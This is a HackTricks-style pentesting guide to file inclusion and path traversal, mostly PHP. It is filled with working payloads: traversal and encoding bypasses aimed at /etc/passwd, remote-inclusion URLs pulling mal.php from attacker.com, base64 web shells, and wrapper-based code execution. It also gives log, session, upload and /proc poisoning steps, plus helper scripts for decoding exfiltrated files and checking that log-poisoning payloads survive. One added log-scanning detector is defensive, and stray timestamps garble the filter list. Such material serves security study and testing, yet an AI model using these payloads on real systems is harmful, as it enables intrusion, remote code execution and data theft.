hacktricks/pentesting-web/file-inclusion/README.md

# File Inclusion/Path traversal
## File Inclusion

**Remote File Inclusion (RFI):** The file is loaded from a remote server (Best: You can write the code and the server will execute it). In PHP this is **disabled** by default (**allow\_url\_include**).\
**Local File Inclusion (LFI):** The server loads a local file.

The vulnerability occurs when the user can control in some way the file that is going to be loaded by the server.

Vulnerable **PHP functions**: require, require\_once, include, include\_once

An interesting tool to exploit this vulnerability: [https://github.com/kurobeats/fimap](https://github.com/kurobeats/fimap)
## Blind - Interesting - LFI2RCE files

```bash
wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../../FUZZ
```
### **Linux**

**Mixing several \*nix LFI lists and adding more paths I have created this one:**

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_linux.txt" %}

Try also to change `/` for `\`\
Try also to add `../../../../../`

A list that uses several techniques to find the file /etc/passwd (to check if the vulnerability exists) can be found [here](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-nix.txt)

### **Windows**

Merge of different wordlists:

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt" %}

Try also to change `/` for `\`\
Try also to remove `C:/` and add `../../../../../`

A list that uses several techniques to find the file /boot.ini (to check if the vulnerability exists) can be found [here](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-win.txt)

### **OS X**

Check the LFI list of Linux.
## Basic LFI and bypasses

All the examples are for Local File Inclusion but could be applied to Remote File Inclusion also (page=http://myserver.com/phpshellcode.txt).

```
http://example.com/index.php?page=../../../etc/passwd
```
### Traversal sequences stripped non-recursively

#### Description

When performing file inclusion attacks, it is common to encounter input sanitization mechanisms that attempt to prevent directory traversal by removing traversal sequences such as `../` or `..\`. However, these sanitization mechanisms are often implemented in a non-recursive manner: they make a single pass and remove each occurrence of the sequence only once. An attacker can nest the sequences so that one stripping pass leaves a valid traversal sequence behind, bypassing the sanitization.

#### Impact

By exploiting this weakness, an attacker can access sensitive files or directories outside of the intended directory structure. This can lead to unauthorized access to confidential information, remote code execution, or other security breaches depending on the specific context and permissions of the vulnerable application.

#### Recommendation

To mitigate this, strip traversal sequences in a loop until none remain, or better, canonicalize the resulting path and verify that it still lies inside the intended base directory. Validating user input against a strict allowlist (for example, a regular expression that only admits expected file names) also helps here, as it does against other injection classes such as SQL injection or cross-site scripting (XSS).

#### Example

Consider a web application that includes files based on user-supplied input and removes `../` from the input to block directory traversal. Because the sanitization runs only once, an attacker can bypass it by nesting traversal sequences so that one stripping pass leaves `../` behind.

```
GET /page?file=../../../etc/passwd HTTP/1.1
Host: vulnerable-website.com
```

The request above is the plain traversal the filter was meant to stop; the variants below survive a single stripping pass (for example `....//` becomes `../` after one removal) and reach `/etc/passwd` anyway. If the sanitization were applied until no sequence remained, these payloads would be neutralized.

```
http://example.com/index.php?page=....//....//....//etc/passwd
http://example.com/index.php?page=....\/....\/....\/etc/passwd
http://some.domain.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
```
### **Null byte (%00)**

Bypasses the appending of more characters to the end of the provided string (bypass of: `$_GET['param']."php"`)

```
http://example.com/index.php?page=../../../etc/passwd%00
```

**This is solved since PHP 5.4**
### **Encoding**

You could use non-standard encodings like double URL encode (and others):

```
http://example.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd
http://example.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
```
### From existent folder

Maybe the back-end is checking the folder path:

```
http://example.com/index.php?page=utils/scripts/../../../../../etc/passwd
```
### Exploring File System Directories on a Server

The file system of a server can be explored recursively to identify directories, not just files, by employing certain techniques. This process involves determining the directory depth and probing for the existence of specific folders. Below is a detailed method to achieve this:

1. **Determine Directory Depth:**
Ascertain the depth of your current directory by successfully fetching the `/etc/passwd` file (applicable if the server is Linux-based). An example URL might be structured as follows, indicating a depth of three:

```bash
http://example.com/index.php?page=../../../etc/passwd # depth of 3
```

2. **Probe for Folders:**
Append the name of the suspected folder (e.g., `private`) to the URL, then navigate back to `/etc/passwd`. The additional directory level requires incrementing the depth by one:

```bash
http://example.com/index.php?page=private/../../../../etc/passwd # depth of 3+1=4
```

3. **Interpret the Outcomes:**
The server's response tells you whether the folder exists: an error or empty output means `private` most likely does not exist at that location, while the contents of `/etc/passwd` confirm that it does.

4. **Recursive Exploration:**
A discovered folder can be probed further for subdirectories or files with the same technique, or by walking to it from a known absolute location with traditional LFI traversal:

```bash
http://example.com/index.php?page=../../../var/www/private/../../../etc/passwd
```
### **Path Truncation Technique**

Path truncation is a method employed to manipulate file paths in web applications. It is often used to access restricted files by bypassing security measures that append additional characters to the end of file paths. The goal is to craft a file path that, once altered by the security measure, still points to the desired file.

In PHP, various representations of a file path can be considered equivalent due to the nature of the file system. For instance:

- `/etc/passwd`, `/etc//passwd`, `/etc/./passwd`, and `/etc/passwd/` are all treated as the same path.
- When the last 6 characters are `passwd`, appending a `/` (making it `passwd/`) doesn't change the targeted file.
- Similarly, if `.php` is appended to a file path (like `shellcode.php`), adding a `/.` at the end won't alter the file being accessed.

The provided examples demonstrate how to utilize path truncation to access `/etc/passwd`, a common target due to its sensitive content (user account information):

```
http://example.com/index.php?page=a/../../../../../../../../../etc/passwd......[ADD MORE]....
http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././.
```

```
http://example.com/index.php?page=a/./.[ADD MORE]/etc/passwd
http://example.com/index.php?page=a/../../../../[ADD MORE]../../../../../etc/passwd
```
### **Filter bypass tricks**
```
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
Maintain the initial path: http://example.com/index.php?page=/var/www/../../etc/passwd
http://example.com/index.php?page=PhP://filter
```
## Remote File Inclusion

In PHP this is disabled by default because **`allow_url_include`** is **Off.** It must be **On** for it to work, and in that case you could include a PHP file from your server and get RCE:

```
http://example.com/index.php?page=http://atacker.com/mal.php
http://example.com/index.php?page=\\attacker.com\shared\mal.php
```

If for some reason **`allow_url_include`** is **On**, but PHP is **filtering** access to external webpages, [according to this post](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64/), you could use for example the data protocol with base64 to decode a b64 PHP code and get RCE:
{% code overflow="wrap" %}
```
PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.txt
```
{% endcode %}
{% hint style="info" %}
In the previous code, the final `+.txt` was added because the attacker needed a string that ended in `.txt`, so the string ends with it and after the b64 decode that part will return just junk and the real PHP code will be included (and therefore, executed).
{% endhint %}
Another example **not using the `php://` protocol** would be:
{% code overflow="wrap" %}
```
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+txt
```
{% endcode %}
## Python Root element
In python in a code like this one:
```python
import os

# file_name is controlled by a user
path = os.path.join(os.getcwd(), "public", file_name)
```
If the user passes an **absolute path** to **`file_name`**, the **previous path is just removed**:

```python
>>> import os
>>> os.path.join(os.getcwd(), "public", "/etc/passwd")
'/etc/passwd'
```
It is the intended behaviour according to [the docs](https://docs.python.org/3.10/library/os.path.html#os.path.join):
> If a component is an absolute path, all previous components are thrown away and joining continues from the absolute path component.
## Java List Directories
It looks like if you have a Path Traversal in Java and you **ask for a directory** instead of a file, a **listing of the directory is returned**. This won't be happening in other languages (afaik).
## Top 25 parameters

Here's a list of the top 25 parameters that could be vulnerable to local file inclusion (LFI) vulnerabilities (from [link](https://twitter.com/trbughunters/status/1279768631845494787)):
```
?cat={payload}
?dir={payload}
?action={payload}
?board={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?prefix={payload}
?include={payload}
?page={payload}
?inc={payload}
?locate={payload}
?show={payload}
?doc={payload}
?site={payload}
?type={payload}
?view={payload}
?content={payload}
?document={payload}
?layout={payload}
?mod={payload}
?conf={payload}
```
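Added example (not from the page or from the tweet it cites): a log-scanning check a defender can run over web-server access logs. It undoes the encodings listed in the bypass sections above (double URL encoding, the `%c0%af` overlong slash, backslash separators), then flags traversal sequences, `php://`/remote wrappers and null bytes in any query parameter, marking whether the parameter is one of the 25 above. The log format, sample lines and IP addresses are constructed.

```python
import re
import urllib.parse
from typing import Dict, List, Tuple

# The 25 parameter names listed above; used to rank findings, not to limit the scan.
TOP25_PARAMS = {
    "cat", "dir", "action", "board", "date", "detail", "file", "download", "path",
    "folder", "prefix", "include", "page", "inc", "locate", "show", "doc", "site",
    "type", "view", "content", "document", "layout", "mod", "conf",
}

# Overlong UTF-8 encodings of "/" and "\" (the %c0%af trick from the Encoding section).
OVERLONG_SEPARATORS = {"%c0%af": "/", "%c1%9c": "\\"}

LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')
TRAVERSAL_RE = re.compile(r"(^|/)\.\.+(/|$)")  # matches ../ and the ..../ variant alike
WRAPPER_RE = re.compile(r"^(php|data|expect|phar|zip|glob|file|https?|ftps?)://")

# Constructed access-log lines in Apache/nginx combined format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Feb/2024:17:52:19 +0000] "GET /index.php?page=home HTTP/1.1" 200 512
203.0.113.5 - - [10/Feb/2024:17:52:20 +0000] "GET /index.php?page=..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 200 1380
203.0.113.5 - - [10/Feb/2024:17:52:21 +0000] "GET /index.php?page=....//....//....//etc/passwd HTTP/1.1" 200 1380
203.0.113.5 - - [10/Feb/2024:17:52:22 +0000] "GET /index.php?page=..%c0%af..%c0%afetc%c0%afpasswd HTTP/1.1" 200 1380
203.0.113.5 - - [10/Feb/2024:17:52:23 +0000] "GET /index.php?page=../../../etc/passwd%00 HTTP/1.1" 200 1380
203.0.113.5 - - [10/Feb/2024:17:52:24 +0000] "GET /index.php?page=PhP://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 2048
203.0.113.5 - - [10/Feb/2024:17:52:25 +0000] "GET /index.php?page=http://203.0.113.9/mal.php HTTP/1.1" 500 0
198.51.100.7 - - [10/Feb/2024:17:53:00 +0000] "GET /search.php?q=..\\..\\win.ini HTTP/1.1" 200 300
"""


def normalize(raw_value: str, max_rounds: int = 3) -> Tuple[str, int]:
    """Undo the layers an attacker may wrap around a payload: repeated URL decoding
    (double/triple encoding), overlong UTF-8 separators and backslash separators.
    Returns the decoded value and the number of decoding rounds that changed it."""
    value, rounds = raw_value.lower(), 0
    for _ in range(max_rounds):
        step = value
        for overlong, plain in OVERLONG_SEPARATORS.items():
            step = step.replace(overlong, plain)
        step = urllib.parse.unquote(step)
        if step == value:
            break
        value, rounds = step, rounds + 1
    return value.replace("\\", "/"), rounds


def analyse_target(target: str) -> List[Dict]:
    """Inspect every query parameter of one request target; returns the flagged ones.
    The query is split by hand because parse_qsl would URL-decode once and lose the
    overlong-UTF-8 and double-encoding evidence."""
    findings = []
    for pair in urllib.parse.urlsplit(target).query.split("&"):
        name, _, raw = pair.partition("=")
        if not name:
            continue
        value, rounds = normalize(raw)
        indicators = []
        if TRAVERSAL_RE.search(value):
            indicators.append("traversal")
        wrapper = WRAPPER_RE.match(value)
        if wrapper:
            indicators.append("wrapper:" + wrapper.group(1))
        if "\x00" in value:
            indicators.append("null_byte")
        if rounds > 1:
            indicators.append("multi_encoding")
        if indicators:
            findings.append({"param": name, "top25": name.lower() in TOP25_PARAMS,
                             "decoded": value, "indicators": indicators})
    return findings


def scan_log(log_text: str) -> List[Dict]:
    """Run analyse_target over each log line; one record per line with findings."""
    hits = []
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        findings = analyse_target(match.group("target"))
        if findings:
            hits.append({"ip": match.group("ip"), "target": match.group("target"),
                         "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        for f in hit["findings"]:
            print(f'{hit["ip"]:14} {f["param"]:6} top25={f["top25"]!s:5} '
                  f'{",".join(f["indicators"]):26} {f["decoded"]!r}')
```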
## LFI / RFI using PHP wrappers & protocols

### php://filter

PHP filters allow performing basic **modification operations on the data** before it's read or written. There are 5 categories of filters:

* [String Filters](https://www.php.net/manual/en/filters.string.php):
2024-02-10 17:52:19 +00:00
* `string.rot13`
* `string.toupper`
* `string.tolower`
* `string.strip_tags`: Remove tags from the data (everything between "<" and ">" chars)
* Note that this filter has disappear from the modern versions of PHP
2022-06-19 19:09:48 +00:00
* [Conversion Filters](https://www.php.net/manual/en/filters.convert.php)
2024-02-10 17:52:19 +00:00
* `convert.base64-encode`
* `convert.base64-decode`
* `convert.quoted-printable-encode`
* `convert.quoted-printable-decode`
* `convert.iconv.*` : Transforms to a different encoding (`convert.iconv.<input_enc>.<output_enc>`). To get the **list of all the encodings** supported run in the console: `iconv -l`

{% hint style="warning" %}
Abusing the `convert.iconv.*` conversion filter you can **generate arbitrary text**, which could be useful to write arbitrary text or make a function like include process arbitrary text. For more info check [**LFI2RCE via php filters**](lfi2rce-via-php-filters.md).
{% endhint %}

* [Compression Filters](https://www.php.net/manual/en/filters.compression.php)
* `zlib.deflate`: Compress the content (useful if exfiltrating a lot of info)
* `zlib.inflate`: Decompress the data
* [Encryption Filters](https://www.php.net/manual/en/filters.encryption.php)
* `mcrypt.*` : Deprecated (removed from core together with the mcrypt extension in PHP 7.2)
* `mdecrypt.*` : Deprecated (same)

* Other Filters

* Running `var_dump(stream_get_filters());` in php you can find a couple of **unexpected filters**:
* `consumed`
* `dechunk`: reverses HTTP chunked encoding
* `convert.*`

```php
# String Filters
## Chain string.toupper, string.rot13 and string.tolower reading /etc/passwd
echo file_get_contents("php://filter/read=string.toupper|string.rot13|string.tolower/resource=file:///etc/passwd");
## Same chain without the "|" char
echo file_get_contents("php://filter/string.toupper/string.rot13/string.tolower/resource=file:///etc/passwd");
## string.strip_tags example (filter removed in PHP 8.0)
echo file_get_contents("php://filter/string.strip_tags/resource=data://text/plain,<b>Bold</b><?php php code; ?>lalalala");

# Conversion filter
## B64 decode
echo file_get_contents("php://filter/convert.base64-decode/resource=data://text/plain,aGVsbG8=");
## Chain B64 encode and decode
echo file_get_contents("php://filter/convert.base64-encode|convert.base64-decode/resource=file:///etc/passwd");
## convert.quoted-printable-encode example
echo file_get_contents("php://filter/convert.quoted-printable-encode/resource=data://text/plain,£hellooo=");
## Output: =C2=A3hellooo=3D
## convert.iconv.utf-8.utf-16le
echo file_get_contents("php://filter/convert.iconv.utf-8.utf-16le/resource=data://text/plain,trololohellooo=");

# Compression Filter
## Compress + B64 (zlib.deflate emits raw DEFLATE, with no zlib/gzip header)
echo file_get_contents("php://filter/zlib.deflate/convert.base64-encode/resource=file:///etc/passwd");
readfile('php://filter/zlib.inflate/resource=test.deflated'); # To decompress the data locally

# Note that the wrapper scheme is case-insensitive (you can use "PhP://" or any other variant)
```
{% hint style="warning" %}
The "php://filter" part is case insensitive
{% endhint %}

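The `zlib.deflate|convert.base64-encode` chain above is handy for exfiltrating large files, but the exfiltrated blob then has to be decoded on your side. The following is an added example (not code from the page or from HackTricks): it reproduces the server-side chain locally so the decoder can be tested offline, and decodes a response body even when the base64 was line-wrapped or lost its `=` padding. The sample file content is constructed; the `wbits=-15` choice encodes my understanding that PHP's `zlib.deflate` filter produces raw DEFLATE (RFC 1951), so `inflate_any` also falls back to zlib and gzip framing in case a target behaves differently.

```python
import base64
import zlib

# Constructed sample: what /etc/passwd-like content might look like on the target.
SAMPLE = (b"root:x:0:0:root:/root:/bin/bash\n"
          b"www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n")


def php_deflate_b64(data: bytes) -> str:
    """Reproduce the server-side chain zlib.deflate|convert.base64-encode.

    Assumption: PHP's zlib.deflate filter emits raw DEFLATE (no zlib/gzip
    header), hence wbits=-15. Verify against your target if decoding fails.
    """
    comp = zlib.compressobj(level=6, wbits=-15)
    raw = comp.compress(data) + comp.flush()
    return base64.b64encode(raw).decode()


def inflate_any(blob: bytes) -> bytes:
    """Decompress without knowing whether the data is raw DEFLATE, zlib or gzip."""
    last_err = None
    for wbits in (-15, 15, 31):  # raw deflate, zlib header, gzip header
        try:
            return zlib.decompress(blob, wbits=wbits)
        except zlib.error as exc:
            last_err = exc
    raise ValueError("not deflate/zlib/gzip data: %s" % last_err)


def decode_filter_output(text: str) -> bytes:
    """Decode the body returned by an LFI that used zlib.deflate + base64.

    Strips whitespace (the blob may be wrapped in HTML or line-broken),
    restores missing "=" padding, then inflates.
    """
    cleaned = "".join(text.split())
    cleaned += "=" * (-len(cleaned) % 4)
    return inflate_any(base64.b64decode(cleaned))


if __name__ == "__main__":
    exfil = php_deflate_b64(SAMPLE)      # what the vulnerable page would return
    print(exfil)
    print(decode_filter_output(exfil).decode())
```

Paste the body of the LFI response into `decode_filter_output`; surrounding HTML is harmless as long as you cut out the base64 run, since stray whitespace is removed and padding is rebuilt.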
### php://fd

This wrapper allows access to file descriptors that the process has open. Potentially useful to exfiltrate the content of opened files:

```php
$myfile = fopen("/etc/passwd", "r"); // typically becomes fd 3 if it is the first file the process opens
echo file_get_contents("php://fd/3"); // read through the already-open descriptor
```

You can also use **php://stdin, php://stdout** and **php://stderr** to access the **file descriptors 0, 1 and 2** respectively (not sure how this could be useful in an attack).

### zip:// and rar://

Upload a Zip or Rar file with a PHPShell inside and access it.\
In order to be able to abuse the rar protocol it **needs to be specifically activated** (`zip://` needs the `zip` extension, which is commonly enabled; `rar://` needs the PECL `rar` extension, which is not part of a default install).
```bash
# Single quotes around the shell: with double quotes bash would expand $_GET and break the payload
echo '<pre><?php system($_GET["cmd"]); ?></pre>' > payload.php

# Zip variant
zip payload.zip payload.php
mv payload.zip shell.jpg
# Upload shell.jpg, then include it ("#" is URL-encoded as %23 and separates the archive from the file inside it;
# use the absolute path of the uploaded archive if the relative one does not resolve):
# http://example.com/index.php?page=zip://shell.jpg%23payload.php

# Rar variant (needs the rar extension on the server)
rar a payload.rar payload.php
mv payload.rar shell.jpg
# http://example.com/index.php?page=rar://shell.jpg%23payload.php

rm payload.php
```

### data://

The `data://` wrapper lets you put the content to include directly in the URL, as `data://<mime-type>[;base64],<payload>` (see the [PHP manual](https://www.php.net/manual/en/wrappers.data.php)). Note that the user-controlled value must be at the very start of the included path: if the application prepends a directory (for example `"/var/www/html/files/" . $_GET['file']`) the `data://` scheme is never parsed and this wrapper cannot be used.
```
http://example.net/?page=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://example.net/?page=data://text/plain,<?php phpinfo(); ?>
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+

http://example.net/?page=data:text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://example.net/?page=data:text/plain,<?php phpinfo(); ?>
http://example.net/?page=data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+

NOTE: the base64 decodes to "<?php system($_GET['cmd']);echo 'Shell done !'; ?>>" (the trailing extra ">" is harmless, it lands outside the PHP tags)
```

Note that including `data://` is restricted by the php configuration `allow_url_include` (it is not affected by `allow_url_fopen`).

### expect://

The `expect` extension has to be installed and enabled (it is not by default). You can then execute commands with it:
```
http://example.com/index.php?page=expect://id
http://example.com/index.php?page=expect://ls
```

### php://input

Specify your payload in the POST body (including `php://input` requires `allow_url_include=On`):

```bash
curl -XPOST "http://example.com/index.php?page=php://input" --data "<?php system('id'); ?>"
```
### phar://
A `.phar` file can be utilized to execute PHP code when a web application leverages functions such as `include` for file loading. The PHP code snippet provided below demonstrates the creation of a `.phar` file:
```php
<?php
// Requires phar.readonly=0 (see the command below)
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
// The stub runs when the archive is included. Code placed after __HALT_COMPILER()
// is never executed, so the command must come before it.
$phar->setStub('<?php system("ls"); __HALT_COMPILER(); ?>');
$phar->stopBuffering();
```

To build the `.phar` file, run the script above with `phar.readonly` disabled (by default PHP refuses to write phar archives):

```bash
php --define phar.readonly=0 create_path.php
```
Upon execution, a file named `test.phar` will be created, which could potentially be leveraged to exploit Local File Inclusion (LFI) vulnerabilities.
In cases where the LFI only performs file reading without executing the PHP code within, through functions such as `file_get_contents()`, `fopen()`, `file()`, `file_exists()`, `md5_file()`, `filemtime()`, or `filesize()`, exploitation of a deserialization vulnerability could be attempted. This vulnerability is associated with the reading of files using the `phar` protocol.
For a detailed understanding of exploiting deserialization vulnerabilities in the context of `.phar` files, refer to the document linked below:
{% content-ref url="phar-deserialization.md" %}
[phar-deserialization.md](phar-deserialization.md)
{% endcontent-ref %}

### More protocols

Check more possible [**protocols to include here**](https://www.php.net/manual/en/wrappers.php)**:**

* [php://memory and php://temp](https://www.php.net/manual/en/wrappers.php.php#wrappers.php.memory) — Write in memory or in a temporary file (not sure how this can be useful in a file inclusion attack)
* [file://](https://www.php.net/manual/en/wrappers.file.php) — Accessing local filesystem
* [http://](https://www.php.net/manual/en/wrappers.http.php) — Accessing HTTP(s) URLs
* [ftp://](https://www.php.net/manual/en/wrappers.ftp.php) — Accessing FTP(s) URLs
* [zlib://](https://www.php.net/manual/en/wrappers.compression.php) — Compression Streams
* [glob://](https://www.php.net/manual/en/wrappers.glob.php) — Find pathnames matching pattern (It doesn't return anything printable, so not really useful here)
* [ssh2://](https://www.php.net/manual/en/wrappers.ssh2.php) — Secure Shell 2
* [ogg://](https://www.php.net/manual/en/wrappers.audio.php) — Audio streams (Not useful to read arbitrary files)

## LFI via PHP's 'assert'

Local File Inclusion (LFI) risks in PHP are notably high when dealing with the `assert` function, which (before PHP 8.0) evaluates a string argument as PHP code. This is particularly problematic if input containing directory traversal characters like ".." is being checked inside such a string but not properly sanitized.

For example, PHP code might be designed to prevent directory traversal like so:

```php
assert("strpos('$file', '..') === false") or die("");
```

While this might seem like it would prevent traversal, it also creates a vector for code injection: `$file` is interpolated into the string before `assert` evaluates it. To exploit this for reading file contents, an attacker could use:
```plaintext
' and die(highlight_file('/etc/passwd')) or '
```

Similarly, for executing arbitrary system commands, one might use:

```plaintext
' and die(system("id")) or '
```

It's important to **URL-encode these payloads**.
## PHP Blind Path Traversal

{% hint style="warning" %}
This technique is relevant in cases where you **control** the **file path** of a **PHP function** that will **access a file** (like a simple call to **`file()`**) but the content of the file is never shown to you.
{% endhint %}

In [**this incredible post**](https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html) it's explained how a blind path traversal can be abused via PHP filters to **exfiltrate the content of a file via an error oracle**.

In summary, the technique uses the **"UCS-4LE" encoding** to make the content of a file so **big** that the **PHP function opening** the file will trigger an **error** (the memory limit is exceeded).

Then, in order to leak the first char the filter **`dechunk`** is used along with others such as **base64** or **rot13**, and finally the filters **convert.iconv.UCS-4.UCS-4LE** and **convert.iconv.UTF16.UTF-16BE** are used to **place other chars at the beginning and leak them**.

**Functions that might be vulnerable**: `file_get_contents`, `readfile`, `finfo->file`, `getimagesize`, `md5_file`, `sha1_file`, `hash_file`, `file`, `parse_ini_file`, `copy`, `file_put_contents` (only target read-only with this), `stream_get_contents`, `fgets`, `fread`, `fgetc`, `fgetcsv`, `fpassthru`, `fputs`

For the technical details check the mentioned post!

## LFI2RCE
### Remote File Inclusion
Explained previously, [**follow this link**](./#remote-file-inclusion).
### Via Apache/Nginx log file

If the application is **vulnerable to LFI** inside an include function and the web server logs are readable, you could try to include **`/var/log/apache2/access.log` or `/var/log/nginx/access.log`** after placing a php shell like **`<?php system($_GET['c']); ?>`** inside the **User-Agent** header or inside a **GET parameter**, so that it gets written to the log and is executed when the log is included.

{% hint style="warning" %}
Note that **if you use double quotes** for the shell instead of **single quotes**, the logger may escape or rewrite them (Apache's access log writes `"` as `\"`, some loggers HTML-encode it as `&quot;`); **PHP will then throw a parse error** on that line and **nothing else in the log will be executed**.

Also, make sure you **write the payload correctly**: a single syntax error poisons the log permanently, PHP will error every time it tries to load the log file and you won't have a second opportunity (until the log rotates).
{% endhint %}

This could also be done in other logs but **be careful,** the code inside the logs could be URL encoded and this could destroy the Shell. The **`Authorization: Basic`** header contains "user:password" in Base64 and the username is written decoded into the access log (the `%u` field of Apache's common log format), so the PHPShell could be inserted in the username part of this header.
Other possible log paths:
```
/var/log/apache2/access.log
/var/log/apache/access.log
/var/log/apache2/error.log
/var/log/apache/error.log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/error_log
```
Fuzzing wordlist: [https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI)
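Before poisoning a log it is worth checking what the payload will look like once the server has escaped it. The block below is an added example (not code from the page or from HackTricks): it models Apache's access-log escaping as I understand `mod_log_config`'s `ap_escape_logitem` (backslash before `"` and `\`, C escapes for `\n`/`\t`/..., `\xHH` for other control and non-ASCII bytes) and checks whether a User-Agent payload reaches the log byte for byte. The log line it prints is constructed; the `c` parameter name is the page's example. Nginx's default log format hex-escapes `"` as `\x22` instead, which breaks a double-quoted payload just the same.

```python
# Model of how Apache's access log escapes a header value (ap_escape_logitem):
# '"' and '\' get a backslash, \b \n \r \t \v get their C escapes, any other
# control or non-ASCII byte becomes \xHH. A shell written with double quotes
# is therefore logged as  system(\"id\")  and PHP fails to parse the log.

ESCAPES = {0x08: "\\b", 0x0A: "\\n", 0x0D: "\\r", 0x09: "\\t", 0x0B: "\\v"}


def apache_escape(value: str) -> str:
    """Return the header value as Apache would write it to the access log."""
    out = []
    for b in value.encode("latin-1", "replace"):
        if b in (0x22, 0x5C):            # '"' and '\' are backslash-escaped
            out.append("\\" + chr(b))
        elif b in ESCAPES:
            out.append(ESCAPES[b])
        elif b < 0x20 or b > 0x7E:       # other control / non-ASCII bytes
            out.append("\\x%02x" % b)
        else:
            out.append(chr(b))
    return "".join(out)


def log_line(ip: str, path: str, user_agent: str) -> str:
    """Constructed sample line in Apache's 'combined' format."""
    return ('%s - - [01/Jan/2024:00:00:00 +0000] "GET %s HTTP/1.1" 200 42 "-" "%s"'
            % (ip, path, apache_escape(user_agent)))


def payload_survives(user_agent: str) -> bool:
    """True if the PHP payload is written to the log exactly as sent."""
    return apache_escape(user_agent) == user_agent


SINGLE = "<?php system($_GET['c']); ?>"     # single quotes: survives logging
DOUBLE = '<?php system($_GET["c"]); ?>'     # double quotes: gets \" and breaks

if __name__ == "__main__":
    for ua in (SINGLE, DOUBLE):
        print(log_line("10.0.0.5", "/index.php?page=x", ua))
        print("  survives logging:", payload_survives(ua))
```

Once `payload_survives` is true for your payload, send it once with something like `curl -A "<?php system(\$_GET['c']); ?>" http://target/` and then include the log file with `&c=id` appended to the request.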
### Via Email
**Send a mail** to an internal account (user@localhost) containing your PHP payload like `<?php echo system($_REQUEST["cmd"]); ?>` and try to include the user's mailbox with a path like **`/var/mail/<USERNAME>`** or **`/var/spool/mail/<USERNAME>`**
### Via /proc/\*/fd/\*
1. Upload a lot of shells (for example : 100)
2. Include [http://example.com/index.php?page=/proc/$PID/fd/$FD](http://example.com/index.php?page=/proc/$PID/fd/$FD), with $PID = PID of the process (can be brute forced) and $FD the file descriptor (can be brute forced too)
### Via /proc/self/environ
Like a log file, send the payload in the User-Agent; it will be reflected inside the `/proc/self/environ` file. This only works when PHP runs as CGI, where request headers become environment variables (`HTTP_USER_AGENT`) of the per-request process; with mod_php or php-fpm, `/proc/self/environ` only holds the server's startup environment.
```
GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
User-Agent: <?=phpinfo(); ?>
```

### Via upload

If you can upload a file, just inject the shell payload in it (e.g. `<?php system($_GET['c']); ?>`).

```
http://example.com/index.php?page=path/to/uploaded/file.png
```

In order to keep the file legible (and to pass image checks) it is best to inject the payload into the metadata of the picture/doc/pdf, e.g. an EXIF comment for JPEG or a comment block for GIF, rather than into the pixel data. The include just parses the file as PHP text, so the extension does not matter.

### Via Zip file upload

Upload a ZIP file containing a PHP shell and access it through the `zip://` wrapper (the part after `%23`, i.e. `#`, is the file inside the archive):

```
example.com/page.php?file=zip://path/to/zip/hello.zip%23rce.php
```

### Via PHP sessions

Check if the website uses PHP sessions (PHPSESSID):

```
Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
```

In PHP these sessions are stored in `/var/lib/php5/sess_[PHPSESSID]` files (on newer Debian/Ubuntu systems `/var/lib/php/sessions/sess_[PHPSESSID]`, and by default `/tmp/sess_[PHPSESSID]`; check `session.save_path` in phpinfo() if you can reach it):
```
/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";
```
Set a value that the application stores in the session (here the `user` field of the login form) to `<?php system('cat /etc/passwd');?>`:
```
login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php
```

Use the LFI to include the PHP session file:
```
login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm2
```
